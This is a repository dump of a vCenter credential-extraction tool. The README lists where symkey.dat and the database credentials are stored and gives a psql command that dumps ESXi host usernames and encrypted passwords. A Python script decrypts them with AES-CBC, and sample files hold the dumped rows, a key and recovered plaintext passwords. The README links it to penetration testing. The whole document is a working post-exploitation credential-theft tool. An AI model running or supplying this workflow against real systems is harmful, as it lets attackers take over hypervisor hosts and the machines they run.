├── README.md ├── decrypt.py ├── password.enc ├── password.txt └── symkey.dat /README.md: -------------------------------------------------------------------------------- 1 | # vhost_password_decrypt 2 | 3 | ## Where is symkey.dat 4 | Windows:C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat 5 | 6 | Linux:/etc/vmware-vpx/ssl/symkey.dat 7 | 8 | ## Where is postgres user password 9 | Windows: C:\ProgramData\VMware\vCenterServer\cfg\vmware-vps\vcdb.properties 10 | 11 | Linux: 12 | /etc/vmware-vpx/vcdb.properties 13 | /etc/vmware/service-state/vpxd/vcdb.properties 14 | 15 | ## Where is psql 16 | Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe 17 | 18 | Linux: /opt/vmware/vpostgres/9.3/bin/psql 19 | 20 | ## export 21 | psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc 22 | 23 | ## How to use 24 | 25 | pip3 install pycryptodome 26 | 27 | python3 decrypt.py symkey.dat password.enc password.txt 28 | 29 | ![image](https://user-images.githubusercontent.com/24275308/145789863-3911ce8b-b6e1-4114-b051-1cb0c4df5068.png) 30 | 31 | 32 | # How this might help during a pentest / tutorial 33 | see the end -> https://pentera.io/blog/information-disclosure-in-vmware-vcenter/ 34 | -------------------------------------------------------------------------------- /decrypt.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import sys 3 | 4 | from Crypto.Cipher import AES 5 | 6 | 7 | usage = """ 8 | Where is symkey.dat 9 | Windows:C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat 10 | Linux:/etc/vmware-vpx/ssl/symkey.dat 11 | 12 | 13 | Where is psql 14 | Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe 15 | Linux: /opt/vmware/vpostgres/9.3/bin/psql 16 | psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc 17 | 18 | python3 decrypt.py symkey.dat password.enc password.txt 19 | """ 20 | 21 | 22 | def pkcs7unpadding(text): 23 | length = len(text) 24 | padding_length = ord(text[-1]) 25 | return text[0:length-padding_length] 26 | 27 | 28 | def decrypt(key, enc_passwords): 29 | passwords = [] 30 | key_bytes = bytes.fromhex(key) 31 | for enc_password in enc_passwords: 32 | content = base64.b64decode(enc_password) 33 | iv_bytes = content[:16] 34 | enc_password_bytes = content[16:] 35 | cipher = AES.new(key_bytes, AES.MODE_CBC, iv_bytes) 36 | password_bytes = cipher.decrypt(enc_password_bytes) 37 | password = str(password_bytes, encoding='utf-8') 38 | password = pkcs7unpadding(password) 39 | print(password) 40 | passwords.append(password) 41 | return passwords 42 | 43 | 44 | def save_decrypt_password(path, passwords): 45 | data = '\n'.join(passwords) 46 | with open(path, 'w') as file: 47 | file.write(data) 48 | 49 | 50 | def get_encrypt_password(path): 51 | encrypt_passwords = [] 52 | with open(path) as file: 53 | for line in file: 54 | if '*' in line: 55 | data = line.split('*') 56 | encrypt_password = data[-1].strip() 57 | encrypt_passwords.append(encrypt_password) 58 | return encrypt_passwords 59 | 60 | 61 | def get_key(path): 62 | with open(path) as file: 63 | key = file.read().strip() 64 | return key 65 | 66 | 67 | def main(): 68 | if len(sys.argv) != 4: 69 | print(usage) 70 | exit(1) 71 | key = get_key(sys.argv[1]) 72 | encrypt_passwords = get_encrypt_password(sys.argv[2]) 73 | save_path = sys.argv[3] 74 | passwords = decrypt(key, encrypt_passwords) 75 | save_decrypt_password(save_path, passwords) 76 | 77 | 78 | if __name__ == '__main__': 79 | main() 80 | -------------------------------------------------------------------------------- /password.enc: -------------------------------------------------------------------------------- 1 | ip_address | user_name | password 2 | ---------------+-----------+------------------------------------------------------------------------------------------- 3 | 10.10.10.1 | vpxuser | *SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ== 4 | 10.10.10.2 | vpxuser | *Pp4JXRLdEH/Js8LVX9drFxDbJQV5Q++KlcgBNCkIgUcZWdSn8rP1TIrkfZDD5RtY5UR1LfFXb6aFbfT8zo9ZMw== 5 | 10.10.10.3 | vpxuser | *2IVqHA7iURUzfvlNmei003UjpXNxzQg0c9q1Mo2/yuvdakFW3kPhUgAP1Nx98/DQkug/phWECq5p3v9/MwXA9g== 6 | 10.10.10.4 | vpxuser | *GQhGLJ71IYGVTDSPD2KjBWp8HXimV0yK94THHEy4ffsc/C6NN5FGIu1hGnIoD4pfkE46u6U0SdLWEGOrcKLcIA== 7 | 10.10.10.5 | vpxuser | *rmnZtQ1AqZXCkYP0UZBiZULbjLTTagZFkzurtkqnAJQlSDrGzv1dOhf/LsrXAuI5oldYgq5Zd5GuFwdfOVE46A== 8 | 10.10.10.6 | vpxuser | *IxrXr9s7gq1YI3KBUsxFDGsdYCgcKfR9w4gr37NKsRk7FywpPPuNuESwJ9Z/TegLKELTCKRICg5Oj47KPzJC2A== 9 | 10.10.10.7 | vpxuser | *2K3s1Mx8NMQDF4EgBX0QBz4VNNJXVuOx01so9r6BjdypsBqDFsFa1typSeCYPfoq2zCQllG4YVegsaRrEOtDSA== 10 | 10.10.10.8 | vpxuser | *5GLxjvRcnkPVboN/LFjTRD+eZqE5smW+nf+E6sQRegcuMbmTJWQk2wlBkf6j17mEIxmi/4AcsSbOiOHXSp40VQ== 11 | 10.10.10.9 | vpxuser | *v905NEaYtTaUQGApLPgnIAhOJWmdivwKqpvUh3LjjZKOP9KvMhFneA1WlEQguBWEiEgNEQBwmz7cx/zd6X3RYw== 12 | 10.10.10.10 | vpxuser | *fuoC/s9xdkHa6/cWD8Pk7wssKcVkHJUK2/+DyFJVLUDT1lCyRJQCI26lu5sIPy4BAOxiBJb//jHNtI80Mq8k6A== 13 | 10.10.10.11 | vpxuser | *eNSVMkZZ6+UBgJMzdVPYejf++P0XSKzTQ+z7HWyY5OhrAZjixOhQZOSbgMKc9cA+opynZLgF8NuhA5y+OGAu6g== 14 | 10.10.10.12 | vpxuser | *LIOnw/NIBh7VklS31evBCnVrGoNUMvyfSz+jMF9nuUymhVqHKFAkEIcUcvGIJMJONLVdV5z1CVI+wNfWb3kTWQ== 15 | 10.10.10.13 | vpxuser | *SlAFEfWysvENteaB7aZ7LpCN1aJD7OK0V3U7GCII/4qP7OtmRCDivAjJeLCuPRiNlNbT2Y91Tf5xkwYPxynHkw== 16 | 10.10.10.14 | vpxuser | *GgvxEjDmg4d9TEEcUA/N3qkIlkHfQ8sfJfeTmy9Ko4M0c2ds5uwzkCZhC0ftZukSsWlqVvrqaTGg15CL9fXvkQ== 17 | 10.10.10.15 | vpxuser | *r69iwzZ8GJBMVpZbvyU02syVKkuNsLqevw/9Eu5V5EQBZZ4f5O4dVohIm6wr9D5jEbJoe7ebyD9e4hYVcHJ0uw== 18 | 10.10.10.16 | vpxuser | *bDQpJ200DC1nQaGSsqcP/oQm/liZ6I1q7y4ccngff7JkdtobEzlQZi7uQG3YxBWmBk4kjYYXDSD992mEu+BhHQ== 19 | 10.10.10.17 | vpxuser | *4Cl4bXUoNUcGUaE+g6tNEW1jgboheL23dvGYrrZiWBzXH+3ZnZZ/RcXWGjN/gmf1ed1gpDj6YMcsrL91oKBTyw== 20 | 10.10.10.18 | vpxuser | *EKPs4PjSKt2tDaCjlCYXH5aUUkQBlzgtiQ1qaj55fUMDUMHqJcaXZ4nsVEJc34dn7p2uarUWvTXJNg+m6PxqOg== 21 | 10.10.10.19 | vpxuser | *pVgNmnRJNe5APS0n1idfyj3+BmCRBLAgVoY3iBTi9b4nEGSme26oQ2kRdo29adqH5NCE27xf6bfu6AybyZaQ1Q== 22 | 10.10.10.20 | vpxuser | *wIUSdSU/4BtmAIM0HuuZWqxeiIuFmHccBg/KDdQEr4GU+X6oZUhJzaMekIH4jlp8XABhvHa7WNkkhc9ma9Myuw== 23 | 10.10.10.21 | vpxuser | *Xa9ItRm3XkGjjEr8IVKytbNhJYrinatirBuIZHDePwDy7yUNknbfnt4bbDWm3+R7z8+dHLkHVXEVKNLuATEQWw== 24 | 10.10.10.22 | vpxuser | *CvVs0KgDLQZP0IB/0N0z8ZWN4hWWnjb+14sb+foyKG8aSy8QGejotGUNdlRR1z/x9/UdXA/jvWKKqNE5Z+0B4w== 25 | 10.10.10.23 | vpxuser | *l6Xvf4xmdkILGJXD8ox7j/mGInar3m71Z+u53wBpUWGV0uNmRdaOhgTn+zz7laKFBkeVAKeAeS8Nt0BRcrinZA== 26 | 10.10.10.24 | vpxuser | *zYQdA0FcjnPMiCsoUOtH7Mq01HSwlnOhevma20YLvwMXT0aTTSB4jmWFLE7zjtFatK3YI0srEQZdPQnRjku+dA== 27 | 10.10.10.25 | vpxuser | *l9Y5Q7a+ziLN/9tdMiG3nW+SNpEhgBnqEeWWJYiKqDqBAAqu5ETn5hAC0UfHDnu+h5pH4hsPjm3MR+Byzy7pBg== 28 | (25 rows) 29 | 30 | -------------------------------------------------------------------------------- /password.txt: -------------------------------------------------------------------------------- 1 | {L1K@7-=3k_8_\kh}2nnur5SP-G..i5j 2 | ~i15CT2kc7lk\K=W05L52IUk}6L^:i7u 3 | ^8@X0D59q6R7_6P]:O@/2m68E.8i7Es[ 4 | ^uyr{QjIHAPZR4ap95^8zkxhZ1Eq_n.b -------------------------------------------------------------------------------- /symkey.dat: -------------------------------------------------------------------------------- 1 | f1d0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd --------------------------------------------------------------------------------